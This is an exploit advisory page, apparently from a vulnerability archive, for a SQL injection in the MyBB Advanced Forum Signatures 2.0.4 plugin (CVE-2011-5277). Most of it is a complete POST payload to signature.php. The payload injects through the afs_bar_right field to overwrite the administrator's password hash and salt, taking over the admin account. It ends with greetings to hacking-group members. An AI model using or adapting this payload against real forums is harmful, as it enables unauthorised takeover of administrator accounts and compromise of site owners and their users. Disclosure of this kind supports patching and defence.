MyBB Advanced Forum Signatures 2.0.4 SQL Injection

2011-10-12 / 2014-04-16
Credit: Mario_Vs
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2011-5277 | CVE-2011-5278
CWE: CWE-89

--------------------------------------------------------------------- Exploit Title : MyBB Advanced Forum Signatures (afsignatures-2.0.4) --------------------------------------------------------------------- Author : Mario_Vs Date : 10/10/2011 Site : http://mariovs.pl/ @ : mario_vs[at]o2.pl --------------------------------------------------------------------- Description > Vendor : http://mods.mybb.com/download/advanced-forum-signatures Tested On : Windows 7 --------------------------------------------------------------------- SQL Injection >> signature.php POST -> afs_html=<a+href="http://localhost/mybb"><img+src="http://localhost/mybb/signature.php?uid=1"+alt=""+/></a>&afs_bbcode=[url=http://localhost/mybb][img]http://localhost/mybb/signature.php?uid=1[/img][/url]&afs_type=bar&afs_background=Default_Blue&afs_showonline=1&afs_full_line1=username&afs_full_line2=usergroup&afs_full_line3=postcount&afs_full_line4=registrationdate&afs_full_line5=reputation&afs_full_line6=blank&afs_bar_left=username&afs_bar_center=usergroup&afs_bar_right=postcount' , `password`= '65a1447de8e73ae67a938ae997ad4ed4', `salt`= 'NPOvUCXg' WHERE `uid`='1';-- --------------------------------------------------------------------- --------------------------------------------------------------------- Greets To: linc0ln.dll, j4ck, lDoran, ElusiveN, d3dik, thc_flow, PricK, artii2 All users: HackinQ.pl


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top